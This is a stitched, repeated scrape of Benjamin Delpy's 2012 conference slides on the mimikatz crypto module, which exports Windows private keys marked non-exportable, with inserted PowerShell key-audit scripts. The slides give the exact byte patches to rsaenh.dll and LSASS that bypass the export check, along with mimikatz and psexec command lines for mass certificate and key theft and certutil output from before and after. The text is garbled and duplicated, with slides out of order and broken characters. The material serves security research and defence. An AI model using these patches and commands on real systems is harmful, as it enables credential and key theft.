...all based on rsaenh.dll
mimikatz - crypto - cng - how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz - crypto - cng - how it's exported ( level)
[Diagram: Process → CNG → RPC → KeyIso Service (LSASS Process) → Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes: Exported Key / no: NTE_NOT_SUPPORTED; LSASS on NT6 is a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP; label on the key handling: PLAYSKOOL]
mimikatz - crypto - patchcng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to ncrypt!SPCryptExportKey inside lsass (keyiso)
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportKeys
[user] Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO ; mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
[callout on the "Exportabilité : NON" line: Exportable]
mimikatz - crypto - patchcng - because sometimes I own LSASS
This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz  short continue_key_export
.text:6C815210 EB 1C    jmp  short continue_key_export
mimikatz - crypto - patchcng - demo time
Import, export, import as not exportable... export again
mimikatz - crypto - patchcng - limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
– certutil can...
mimikatz - crypto - patchcng - bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil
Before patching LSASS:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After patching LSASS:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz - crypto - memo
Some commands
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz - crypto - what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer – no admin, no admin, no admin...
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
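To see which of a host's certificates depend on software-only CSPs/KSPs (the rsaenh.dll and Microsoft Software KSP keys the patches above target) rather than on smartcards, HSMs or TPM-backed providers, the following PowerShell audit is an added example, not part of the original slides or of mimikatz. It assumes Windows PowerShell 5.1 or later on .NET Framework 4.6+, read access to the two "My" stores, and classifies anything that is not the Microsoft Software Key Storage Provider as hardware-backed, which is a heuristic to verify by hand.

```powershell
# Added example (not from the slides): audit the private keys behind certificates
# in the machine and user "My" stores, reporting API, provider, exportability
# and whether the key is hardware-backed. Assumes Windows PowerShell 5.1+ / .NET 4.6+.

function Get-PrivateKeyInfo {
    param([Parameter(Mandatory)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

    $info = [ordered]@{
        Subject    = $Cert.Subject
        Thumbprint = $Cert.Thumbprint
        Api        = 'none'
        Provider   = $null
        Container  = $null
        Exportable = $null
        Hardware   = $null
    }
    if (-not $Cert.HasPrivateKey) { return [pscustomobject]$info }

    # Legacy CryptoAPI path: the key is handled by a CSP loaded into this process
    # (rsaenh.dll for the Microsoft RSA providers), so the process itself holds it.
    $capi = $null
    try { $capi = $Cert.PrivateKey } catch { $capi = $null }   # throws for CNG-only keys
    if ($capi -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        $ci = $capi.CspKeyContainerInfo
        $info.Api        = 'CryptoAPI'
        $info.Provider   = $ci.ProviderName
        $info.Container  = $ci.KeyContainerName
        $info.Exportable = $ci.Exportable        # the flag CPExportKey checks
        $info.Hardware   = $ci.HardwareDevice
        return [pscustomobject]$info
    }

    # CNG path: the key lives behind a KSP, reached through the KeyIso service in LSASS.
    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
    if ($rsa -is [System.Security.Cryptography.RSACng]) {
        $k = $rsa.Key
        $info.Api        = 'CNG'
        $info.Provider   = $k.Provider.Provider
        $info.Container  = $k.KeyName
        # ExportPolicy is a flag set; anything other than None lets the key leave the KSP.
        $info.Exportable = ($k.ExportPolicy -ne [System.Security.Cryptography.CngExportPolicies]::None)
        # Assumption: only the Microsoft Software KSP is treated as software; smartcard,
        # TPM and vendor KSPs are reported as hardware and should be verified by hand.
        $info.Hardware   = ($k.Provider.Provider -ne 'Microsoft Software Key Storage Provider')
    } else {
        $info.Api = 'unknown/non-RSA'            # e.g. ECDSA keys are not covered here
    }
    [pscustomobject]$info
}

function Invoke-KeyAudit {
    param([string[]]$Stores = @('Cert:\LocalMachine\My', 'Cert:\CurrentUser\My'))
    foreach ($store in $Stores) {
        Get-ChildItem -Path $store | Where-Object { $_.HasPrivateKey } | ForEach-Object {
            Get-PrivateKeyInfo -Cert $_ |
                Add-Member -NotePropertyName Store -NotePropertyValue $store -PassThru
        }
    }
}

# Software-backed keys (Hardware = False) come first. Their "Exportable" value is
# only advisory: it is exactly the check crypto::patchcapi / crypto::patchcng bypass,
# so once an admin can patch the process or LSASS, any software key can be exported.
Invoke-KeyAudit |
    Sort-Object Hardware, Exportable |
    Format-Table Store, Subject, Api, Provider, Exportable, Hardware -AutoSize
```

Run it elevated to see machine keys; a non-empty software-backed list is the population that the smartcard/HSM/TPM recommendations above are meant to shrink.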
mimikatz - what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– ...
...
mimikatz - that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz :: crypto :: cng – how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with Common Criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key Isolation service" (KeyIso) functions.
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng – how it's exported ( level)
[Diagram: Process → CNG → RPC → KeyIso Service (LSASS process: NT6 system protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP). Inside KeyIso: "Ask to export Key" → "Load Private Key" (DPAPI decode, labelled PLAYSKOOL on the slide) → "Exportable?": yes → Exported Key; no → NTE_NOT_SUPPORTED.]
mimikatz :: crypto :: patchcng – because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON
	Taille clé : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
(the "Exportabilité : NON" line is the "Exportable?" flag of the diagram)
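The "Exportable?" check of the diagram, seen from the key owner's side, as an added PowerShell example that is not from the talk or from mimikatz: it creates an RSA key in the Microsoft Software Key Storage Provider with a chosen export policy, asks the KSP for the private blob (the NCryptExportKey path served by KeyIso inside lsass) and reports the result, which for a policy of None is the NTE_NOT_SUPPORTED code 0x80090029 shown above. The key name is a placeholder for the demo, and .NET Framework 4.5 or later is assumed for the public HResult property.

```powershell
# Added example, not from the talk or from mimikatz. Creates a per-user RSA key in the
# Microsoft Software KSP with the requested export policy, tries to pull the private
# half out through CNG and reports whether the KSP allowed it. The key name is a
# placeholder for this demo; the key is deleted again when the function returns.
# Assumes .NET Framework 4.5+ (Exception.HResult is public) or PowerShell 7.
Add-Type -AssemblyName System.Core   # CngKey and friends on .NET Framework

function Test-CngExportPolicy {
    param(
        [string]$KeyName = 'asfws-demo-key',
        [System.Security.Cryptography.CngExportPolicies]$Policy =
            [System.Security.Cryptography.CngExportPolicies]::None
    )
    $params = New-Object System.Security.Cryptography.CngKeyCreationParameters
    $params.Provider     = [System.Security.Cryptography.CngProvider]::MicrosoftSoftwareKeyStorageProvider
    $params.ExportPolicy = $Policy
    # NCRYPT_LENGTH_PROPERTY ("Length") selects the modulus size: 2048 bits, like the key in the talk.
    $params.Parameters.Add((New-Object System.Security.Cryptography.CngProperty(
        'Length', [BitConverter]::GetBytes([int]2048),
        [System.Security.Cryptography.CngPropertyOptions]::None)))

    $key = [System.Security.Cryptography.CngKey]::Create(
        [System.Security.Cryptography.CngAlgorithm]::Rsa, $KeyName, $params)
    try {
        # GenericPrivateBlob = "PRIVATEBLOB": the plaintext private half. The KSP refuses it
        # unless the policy carries AllowPlaintextExport (AllowExport alone only permits
        # wrapped export), so None is the case the diagram routes to NTE_NOT_SUPPORTED.
        $blob = $key.Export([System.Security.Cryptography.CngKeyBlobFormat]::GenericPrivateBlob)
        [pscustomobject]@{ Policy = $Policy; Exported = $true; Bytes = $blob.Length; HResult = '0x00000000' }
    } catch {
        # PowerShell wraps .NET method exceptions; the CryptographicException carrying the
        # NTE_* code is the inner one.
        $ex = $_.Exception
        if ($ex.InnerException) { $ex = $ex.InnerException }
        [pscustomobject]@{ Policy = $Policy; Exported = $false; Bytes = 0; HResult = ('0x{0:x8}' -f $ex.HResult) }
    } finally {
        $key.Delete()   # removes the key file from the KSP and releases the handle
    }
}

# Non-exportable key (the protected case), then a plaintext-exportable one for comparison.
Test-CngExportPolicy -Policy None
Test-CngExportPolicy -Policy AllowPlaintextExport
```

The point for a defender is that this refusal lives in the KSP code inside lsass, which is exactly what the next slides modify; the policy is a check, not a property of the key material.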
mimikatz :: crypto :: patchcng – because sometimes I own LSASS
This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
Before: .text:6C815210 75 1C    jnz short continue_key_export
After:  .text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng – demo time
Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng – limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
mimikatz :: crypto :: patchcng – bonus
After one admin patched LSASS, all users of the current system benefit from extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
– Yeah, like the good old certutil

Before patching LSASS:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach cert (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After patching LSASS:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach cert (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto – memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
 • So yes, mimikatz can export it
mimikatz :: crypto – what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computers – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
 • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
 • Their biometrics stuff was a little buggy ;)
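An added PowerShell audit, not from the talk or from mimikatz, that serves the memo slide (duplicate keys on re-import, private keys surviving certificate deletion) and this one (software keys versus smartcards, tokens and HSMs): for every certificate in the current user's "My" store it reports whether the private key is a CryptoAPI CSP or a CNG KSP key, whether that provider is the software one the patches above reach, and whether the export flag is set; it then lists key files on disk that no certificate references any more. It assumes Windows 8 / .NET Framework 4.6 or later for RSACertificateExtensions; machine keys under %ProgramData%\Microsoft\Crypto need an elevated run and are left out.

```powershell
# Added audit script, not from the talk or from mimikatz. Current-user store only;
# assumes Windows 8 / .NET Framework 4.6+ (RSACertificateExtensions, Get-ChildItem -Directory).

function Get-PrivateKeyInfo {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    $info = [ordered]@{
        Subject = $Cert.Subject; Thumbprint = $Cert.Thumbprint
        Api = 'none'; Provider = $null; Container = $null; Software = $null; Exportable = $null
    }
    if (-not $Cert.HasPrivateKey) { return [pscustomobject]$info }

    # Legacy property: only resolves CryptoAPI (CSP) keys and throws for CNG keys.
    $csp = $null
    try { $csp = $Cert.PrivateKey } catch { $csp = $null }
    if ($csp -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        $ci = $csp.CspKeyContainerInfo
        $info.Api        = 'CAPI'
        $info.Provider   = $ci.ProviderName             # e.g. Microsoft Enhanced Cryptographic Provider v1.0
        $info.Container  = $ci.UniqueKeyContainerName   # file name under %APPDATA%\Microsoft\Crypto\RSA\<SID>
        $info.Software   = -not $ci.HardwareDevice
        $info.Exportable = $ci.Exportable               # the flag rsaenh!CPExportKey checks
        return [pscustomobject]$info
    }
    try {
        $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
        if ($rsa -is [System.Security.Cryptography.RSACng]) {
            $k = $rsa.Key
            $info.Api        = 'CNG'
            $info.Provider   = $k.Provider.Provider
            $info.Container  = $k.UniqueName            # file name under %APPDATA%\Microsoft\Crypto\Keys
            $info.Software   = ($k.Provider -eq [System.Security.Cryptography.CngProvider]::MicrosoftSoftwareKeyStorageProvider)
            # NCRYPT_ALLOW_EXPORT_FLAG / NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG: what ncrypt!SPCryptExportKey checks
            $info.Exportable = ($k.ExportPolicy.HasFlag([System.Security.Cryptography.CngExportPolicies]::AllowExport) -or
                                $k.ExportPolicy.HasFlag([System.Security.Cryptography.CngExportPolicies]::AllowPlaintextExport))
        }
    } catch {
        # Smartcard / HSM keys often cannot be opened without the device present: report, do not fail.
        $info.Api = 'unavailable: ' + $_.Exception.Message
    }
    [pscustomobject]$info
}

function Find-OrphanedKeyFiles {
    param([string[]]$ReferencedNames)
    # CNG software-KSP user keys and CryptoAPI user key containers, one file per key.
    $dirs = @("$env:APPDATA\Microsoft\Crypto\Keys")
    $dirs += Get-ChildItem "$env:APPDATA\Microsoft\Crypto\RSA" -Directory -ErrorAction SilentlyContinue |
             ForEach-Object { $_.FullName }
    foreach ($dir in $dirs) {
        Get-ChildItem $dir -File -ErrorAction SilentlyContinue |
            Where-Object { $ReferencedNames -notcontains $_.Name } |
            Select-Object FullName, Length, LastWriteTime
    }
}

$report = Get-ChildItem Cert:\CurrentUser\My | ForEach-Object { Get-PrivateKeyInfo -Cert $_ }
# Software=True keys are the ones the CAPI/CNG patches reach; Exportable=False only holds
# while rsaenh.dll in the process and ncrypt in lsass are unpatched.
$report | Format-Table Subject, Api, Provider, Software, Exportable -AutoSize

# Key files no certificate points at: deleted certificates and duplicate imports end up here.
# Review before removal (certutil -user -delkey): applications also keep certificate-less keys in these folders.
$referenced = @($report | Where-Object { $_.Container } | ForEach-Object { $_.Container })
Find-OrphanedKeyFiles -ReferencedNames $referenced | Format-Table -AutoSize
```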
mimikatz – what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz – that's all folks!
Thanks to
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
 • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
 • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
… especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz crypto / capi: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader…
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 40
mimikatz crypto / capi: how it's exported ( level)
